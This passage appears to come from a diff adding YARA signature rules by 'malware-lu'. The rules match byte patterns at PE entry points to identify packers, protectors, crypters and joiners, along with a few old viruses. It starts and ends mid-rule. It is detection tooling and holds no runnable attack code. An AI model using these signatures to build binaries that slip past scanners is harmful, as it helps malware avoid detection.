+		$a0 = { E8 A5 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4A ?? ?? 00 5B ?? ?? 00 6E ?? ?? 00 00 00 00 00 6B 45 72 4E 65 4C 33 32 2E 64 4C 6C 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 ?? ?? 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Kryptonv02
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 0C 24 E9 0A 7C 01 ?? AD 42 40 BD BE 9D 7A 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakePELockNT204FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 EB 03 CD 20 EB EB 01 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorPacK150XCGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 83 A5 ?? ?? ?? ?? ?? F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 35 2E 00 83 7D 0C ?? 75 23 8B 45 08 A3 ?? ?? ?? ?? 6A 04 68 00 10 00 00 68 20 03 00 00 6A 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? EB 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule D1S1Gv11BetaScrambledEXED1N
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 07 00 00 00 E8 1E 00 00 00 C3 90 58 89 C2 89 C2 25 00 F0 FF FF 50 83 C0 55 8D 00 FF 30 8D 40 04 FF 30 52 C3 8D 40 00 55 8B EC 83 C4 E8 53 56 57 8B 4D 10 8B 45 08 89 45 F8 8B 45 0C 89 45 F4 8D 41 61 8B 38 8D 41 65 8B 00 03 C7 89 45 FC 8D 41 69 8B 00 03 C7 8D 51 6D 8B 12 03 D7 83 C1 71 8B 09 03 CF 2B CA 72 0A 41 87 D1 80 31 FF 41 4A 75 F9 89 45 F0 EB 71 8B }
+
+condition:
+		$a0
+}
+	
+	
+rule ReversingLabsProtector074betaAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 00 41 00 E8 01 00 00 00 C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtect109gRiscosoftwareInc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 F9 50 E8 01 00 00 00 7C 58 58 49 50 E8 01 00 00 00 7E 58 58 79 04 66 B9 B8 72 E8 01 00 00 00 7A 83 C4 04 85 C8 EB 01 EB C1 F8 BE 72 03 73 01 74 0F 81 01 00 00 00 F9 EB 01 75 F9 E8 01 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NorthStarPEShrinker13Liuxingping
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorV13CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC ?? 53 56 57 EB 0C 45 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoinerSmallbuild035GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 51 33 CB 86 C9 59 E8 9E FD FF FF 66 87 DB 6A 00 E8 0C 00 00 00 FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upack020betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 40 00 AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPX20030XMarkusOberhumerLaszloMolnarJohnReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }
+
+condition:
+		$a0
+}
+	
+	
+rule WinUpackv039finalByDwingc2005h1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 39 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler12Bp0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 D8 53 56 57 33 C0 89 45 D8 89 45 DC 89 45 E0 89 45 E4 89 45 E8 B8 70 3A 40 00 E8 C4 EC FF FF 33 C0 55 68 5C 3F 40 00 64 FF 30 64 89 20 E8 C5 D7 FF FF E8 5C F5 FF FF B8 20 65 40 00 33 C9 BA 04 01 00 00 E8 D3 DB FF FF 68 04 01 00 00 68 20 65 40 00 6A 00 FF 15 10 55 40 00 BA 6C 3F 40 00 B8 14 55 40 00 E8 5A F4 FF FF 85 C0 0F 84 1B 04 00 00 BA 18 55 40 00 8B 0D 14 55 40 00 E8 16 D7 FF FF 8B 05 88 61 40 00 8B D0 B8 54 62 40 00 E8 D4 E3 FF FF B8 54 62 40 00 E8 F2 E2 FF FF 8B D0 B8 18 55 40 00 8B 0D 88 61 40 00 E8 E8 D6 FF FF FF 35 34 62 40 00 FF 35 30 62 40 00 FF 35 3C 62 40 00 FF 35 38 62 40 00 8D 55 E8 A1 88 61 40 00 E8 E3 F0 FF FF 8B 55 E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule Upack010012betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 48 01 40 00 AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB AD 50 97 51 AD 87 F5 58 8D 54 86 5C FF D5 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEArmorV07Xhying
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 55 56 81 C5 ?? ?? ?? ?? 55 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LauncherGeneratorv103
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 20 40 00 68 10 20 40 00 6A 00 6A 00 6A 20 6A 00 6A 00 6A 00 68 F0 22 40 00 6A 00 E8 93 00 00 00 85 C0 0F 84 7E 00 00 00 B8 00 00 00 00 3B 05 68 20 40 00 74 13 6A ?? 68 60 23 40 00 68 20 23 40 00 6A 00 E8 83 00 00 00 A1 58 20 40 00 3B 05 6C 20 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule yodasProtector102103AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NakedPacker10byBigBoote
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 FC 0F B6 05 34 ?? ?? ?? 85 C0 75 31 B8 50 ?? ?? ?? 2B 05 04 ?? ?? ?? A3 30 ?? ?? ?? A1 00 ?? ?? ?? 03 05 30 ?? ?? ?? A3 38 ?? ?? ?? E8 9A 00 00 00 A3 50 ?? ?? ?? C6 05 34 ?? ?? ?? 01 83 3D 50 ?? ?? ?? 00 75 07 61 FF 25 38 ?? ?? ?? 61 FF 74 24 04 6A 00 FF 15 44 ?? ?? ?? 50 FF 15 40 ?? ?? ?? C3 FF 74 24 04 6A 00 FF 15 44 ?? ?? ?? 50 FF 15 48 ?? ?? ?? C3 8B 4C 24 04 56 8B 74 24 10 57 85 F6 8B F9 74 0D 8B 54 24 10 8A 02 88 01 }
+
+condition:
+		$a0
+}
+	
+	
+rule tElockv080
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 F9 11 00 00 C3 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01YodasProtector102Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 90 90 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtector11Xvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D 00 E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 EB 12 FF 9C 74 03 75 01 E9 81 0C 24 00 01 00 00 9D 90 EB F4 64 89 25 00 00 00 00 EB E6 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMASM32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 DB E8 02 00 00 00 86 43 5E 8D 1D D0 75 CF 83 C1 EE 1D 68 50 ?? 8F 83 EB 02 3D 0F 5A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pohernah102byKas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED DE 26 40 00 8B BD 05 28 40 00 8B 8D 0D 28 40 00 B8 25 28 40 00 01 E8 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 09 28 40 00 31 C0 51 31 C9 66 B9 F7 00 66 83 F9 00 74 49 8B 57 0C 03 95 09 28 40 00 8B 85 11 28 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 89 CE E8 27 00 00 00 89 C1 5F B8 25 28 40 00 01 E8 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 01 28 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 21 FE 89 F0 5F 5E C3 60 83 F0 05 40 90 48 83 F0 05 89 C6 89 D7 60 E8 0B 00 00 00 61 83 C7 08 83 E9 07 E2 F1 61 C3 57 8B 1F 8B 4F 04 68 B9 79 37 9E 5A 42 89 D0 48 C1 E0 05 BF 20 00 00 00 4A 89 DD C1 E5 04 29 E9 8B 6E 08 31 DD 29 E9 89 DD C1 ED 05 31 C5 29 E9 2B 4E 0C 89 CD C1 E5 04 29 EB 8B 2E 31 CD 29 EB 89 CD C1 ED 05 31 C5 29 EB 2B 5E 04 29 D0 4F 75 C8 5F 89 1F 89 4F 04 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ActiveMARK5xTrymediaSystemsInc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 20 2D 2D 4D 50 52 4D 4D 47 56 41 2D 2D 00 75 73 65 72 33 32 2E 64 6C 6C 00 4D 65 73 73 61 67 65 42 6F 78 41 00 54 68 69 73 20 61 70 70 6C 69 63 61 74 69 6F 6E 20 63 61 6E 6E 6F 74 20 72 75 6E 20 77 69 74 68 20 61 6E 20 61 63 74 69 76 65 20 64 65 62 75 67 }
+
+condition:
+		$a0
+}
+	
+	
+rule RCryptorv20HideEPVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 D1 83 F1 FF 6A 00 F7 D1 83 F1 FF 81 04 24 DC 20 ?? 00 F7 D1 83 F1 FF E8 00 00 00 00 F7 D1 83 F1 FF C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov172v173
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 E8 C1 ?? ?? 68 F4 86 ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AsCryptv01SToRM2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 ?? ?? ?? 83 ?? ?? ?? ?? 90 90 90 83 ?? ?? E2 }
+
+condition:
+		$a0
+}
+	
+	
+rule AsCryptv01SToRM3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 ?? ?? ?? 83 ?? ?? ?? ?? 90 90 90 51 ?? ?? ?? 01 00 00 00 83 ?? ?? E2 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASProtectV2XDLLAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AsCryptv01SToRM4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 ?? ?? ?? 83 ?? ?? ?? ?? 90 90 90 E2 }
+
+condition:
+		$a0
+}
+	
+	
+rule yzpack20UsAr
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 25 ?? ?? ?? ?? 61 87 CC 55 45 45 55 81 ED CA 00 00 00 55 A4 B3 02 FF 14 24 73 F8 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 1F B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3C AA EB DC FF 54 24 04 2B CB 75 0F FF 54 24 08 EB 27 AC D1 E8 74 30 13 C9 EB 1B 91 48 C1 E0 08 AC FF 54 24 08 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 99 BD ?? ?? ?? ?? FF 65 28 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PasswordprotectormySMT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 5D 8B FD 81 ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? 83 ?? ?? 89 ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 46 80 ?? ?? 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV1258V133XObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 ?? 00 00 00 EB 02 ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ReflexiveArcadeWrapper
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 98 68 42 00 68 14 FA 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 F8 50 42 00 33 D2 8A D4 89 15 3C E8 42 00 8B C8 81 E1 FF 00 00 00 89 0D 38 E8 42 00 C1 E1 08 03 CA 89 0D 34 E8 42 00 C1 E8 10 A3 30 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxTrojanTelefoon
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 1E E8 3B 01 BF CC 01 2E 03 3E CA 01 2E C7 05 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv030betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 30 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxACMEClonewarMutant
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC AD 3D FF FF 74 20 E6 42 8A C4 E6 42 E4 61 0C 03 E6 61 AD B9 40 1F E2 FE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov2xxCopyMemII
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A ?? 8B B5 ?? ?? ?? ?? C1 E6 04 8B 85 ?? ?? ?? ?? 25 07 ?? ?? 80 79 05 48 83 C8 F8 40 33 C9 8A 88 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 81 E2 07 ?? ?? 80 79 05 4A 83 CA F8 42 33 C0 8A 82 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TPACKv05cm1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? FD 60 BE ?? ?? BF ?? ?? B9 ?? ?? F3 A4 8B F7 BF ?? ?? FC 46 E9 8E FE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv271
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 00 60 EB 00 E8 00 00 00 00 5D 81 ED B0 27 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TPACKv05cm2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? FD 60 BE ?? ?? BF ?? ?? B9 ?? ?? F3 A4 8B F7 BF ?? ?? FC 46 E9 CE FD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeJoiner10Yodaf2f
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00 68 04 11 40 00 6A 00 E8 1A 03 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 68 04 11 40 00 E8 EC 02 00 00 83 F8 FF 0F 84 83 02 00 00 A3 08 12 40 00 6A 00 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv101bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MacromediaWindowsFlashProjectorPlayerv30
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 44 56 FF 15 94 13 42 00 8B F0 B1 22 8A 06 3A C1 75 13 8A 46 01 46 3A C1 74 04 84 C0 75 F4 38 0E 75 0D 46 EB 0A 3C 20 7E 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinV11cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack118aPlib043ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 ?? 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 ?? 83 C7 ?? 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 BD 0A 04 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 A7 03 00 00 89 85 16 04 00 00 5B FF B5 16 04 00 00 56 FF D3 83 C4 ?? 8B B5 16 04 00 00 8B C6 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DotFixNiceProtectvna
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 55 00 00 00 8D BD 00 10 40 00 68 ?? ?? ?? 00 03 3C 24 8B F7 90 68 31 10 40 00 9B DB E3 55 DB 04 24 8B C7 DB 44 24 04 DE C1 DB 1C 24 8B 1C 24 66 AD 51 DB 04 24 90 90 DA 8D 77 10 40 00 DB 1C 24 D1 E1 29 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv032betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 32 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PackItBitch10archphase
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 28 ?? ?? ?? 35 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 41 ?? ?? ?? 50 ?? ?? ?? 00 00 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? ?? ?? 79 ?? ?? ?? 7D ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule JDPack2xJDPack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 68 51 40 00 68 04 25 40 00 64 A1 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RPolyCryptv10personalpolycryptorsignfrompinch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 58 97 97 60 61 8B 04 24 80 78 F3 6A E8 00 00 00 00 58 E8 00 00 00 00 58 91 91 EB 00 0F 85 6B F4 76 6F E8 00 00 00 00 83 C4 04 E8 00 00 00 00 58 90 E8 00 00 00 00 83 C4 04 8B 04 24 80 78 F1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv031betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 31 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Packmanv0001
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 58 8D A8 ?? ?? FF FF 8D 98 ?? ?? ?? FF 8D ?? ?? 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PEPack099Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 11 00 00 00 5D 83 ED 06 80 BD E0 04 90 90 01 0F 84 F2 FF CC 0A E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor239minimumprotection
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? E9 ?? ?? ?? FF 50 C1 C8 18 89 05 ?? ?? ?? ?? C3 C1 C0 18 51 E9 ?? ?? ?? FF 84 C0 0F 84 6A F9 FF FF E9 ?? ?? ?? FF C3 E9 ?? ?? ?? FF E8 CF E9 FF FF B8 01 00 00 00 E9 ?? ?? ?? FF 2B D0 68 A0 36 80 D4 59 81 C9 64 98 FF 99 E9 ?? ?? ?? FF 84 C0 0F 84 8E EC FF FF E9 ?? ?? ?? FF C3 87 3C 24 5F 8B 00 03 45 FC 83 C0 18 E9 ?? ?? ?? FF 87 0C 24 59 B8 01 00 00 00 D3 E0 23 D0 E9 02 18 00 00 0F 8D DB 00 00 00 C1 E8 14 E9 CA 00 00 00 9D 87 0C 24 59 87 1C 24 68 AE 73 B9 96 E9 C5 10 00 00 0F 8A ?? ?? ?? ?? E9 ?? ?? ?? FF 81 FD F5 FF 8F 07 E9 4F 10 00 00 C3 E9 5E 12 00 00 87 3C 24 E9 ?? ?? ?? FF E8 ?? ?? ?? FF 83 3D ?? ?? ?? ?? 00 0F 85 ?? ?? ?? ?? 8D 55 EC B8 ?? ?? ?? ?? E9 ?? ?? ?? FF E8 A7 1A 00 00 E8 2A CB FF FF E9 ?? ?? ?? FF C3 E9 ?? ?? ?? FF 59 89 45 E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualC60ASM
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 D0 EB 02 CD 20 BE BB 74 1C FB EB 02 CD 20 BF 3B ?? ?? FB C1 C1 03 33 F7 EB 02 CD 20 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HaspdongleAlladin
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 53 51 52 57 56 8B 75 1C 8B 3E ?? ?? ?? ?? ?? 8B 5D 08 8A FB ?? ?? 03 5D 10 8B 45 0C 8B 4D 14 8B 55 18 80 FF 32 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SafeDiscv4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 42 6F 47 5F }
+
+condition:
+		$a0
+}
+	
+	
+rule PKLITEv112v115v1201
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 73 ?? 2D ?? ?? FA 8E D0 FB 2D ?? ?? 8E C0 50 B9 ?? ?? 33 FF 57 BE ?? ?? FC F3 A5 CB B4 09 BA ?? ?? CD 21 CD 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv112v115v1202
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 3B C4 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptorv153
+{
+      meta:
+		author="malware-lu"
+strings:
